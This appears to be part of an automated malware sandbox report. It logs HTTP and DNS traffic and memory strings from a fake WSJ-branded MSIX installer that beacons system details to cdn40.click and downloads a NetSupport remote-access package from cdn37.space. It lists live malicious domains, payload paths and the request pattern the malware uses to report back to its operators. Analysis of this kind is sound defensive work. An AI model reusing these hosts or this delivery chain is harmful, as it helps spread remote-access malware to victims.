                                    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
                                    Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: 120X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-BM-Theme: 000000;0078d7X-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1714057116User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 75625C546F974997B6B8D64F1964277DX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                    Source: global trafficHTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /files/WSJ.msix HTTP/1.1Host: cdn40.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                    Source: global trafficHTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn37.spaceConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
                                    Source: global trafficHTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficDNS traffic detected: DNS query: wsj.pm
                                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                    Source: global trafficDNS traffic detected: DNS query: cdn40.click
                                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                                    Source: global trafficDNS traffic detected: DNS query: cdn37.space
                                    Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                    Source: unknownHTTP traffic detected: POST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1Host: cdn40.clickConnection: keep-aliveContent-Length: 252sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e4f9eb7b94-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpO2r4fs25YzisX9YLOcwDB82LXIOVmigH3XY%2FFt67AmUUvniElkOaPdgZmArGqppH%2F8FlUuDxQmnY%2FPc%2FsNACxS8lgRTe5PUJ2RmA9z1zD21d%2BOYMBhqFgbGMcfZpAYWX%2BTRmneJHv%2FopjQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e82dd844fb-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SrsSnqixI3RpKqX%2FZUq7nKTdWLt9aLmUfGW8t0eOlRH1f1EslcbspDPTWflaGdC8mouJqcFzXWVIEyUAsbXrmrGqdWf8ObwhW4bmNHSTKSNhbBXy9%2FbjNzvLQTDXeOZtM%2BEc15T0difRof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:47 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32eb4ea069f2-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdmZL%2B3RJLcDnTaFr83qRRF8nS%2F%2BnqX9D09jHlAuck7c2%2BV4bzbZgHpxZ00TGk0I7NRAFz0YdbJxdcAcmoP%2Bh%2BRwCW4jWIJhKb2cOrK8xP%2FRmkYT%2Brsyjt7xFzl1UT95yt8BkTYpbhPgdKg6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                    Source: client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drString found in binary or memory: http://%s/fakeurl.htm
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drString found in binary or memory: http://%s/testpage.htm
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                    Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://127.0.0.1
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                                    Source: client32.exe, client32.exe, 00000020.00000003.1940686628.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000020.00000003.1941988586.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1940878596.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1942600345.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2537133329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2543509132.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                    Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspBranchCache
                                    Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspConnected
                                    Source: client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspCoreNet-Diag-ICMP6-EchoRequest-Out-NoScopeLMEMX
                                    Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspMicrosoft-Windows-PeerDist-HostedClient-OutLMEMX
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                    Source: client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspuest-Out-NoScope
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                                    Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                    Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ocsp.thawte.com0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png8
                                    Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680011147.00000196D5F73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://s2.symcb.com0
                                    Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micros
                                    Source: AppInstaller.exe, 0000000E.00000002.1763243158.00000196CDBEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
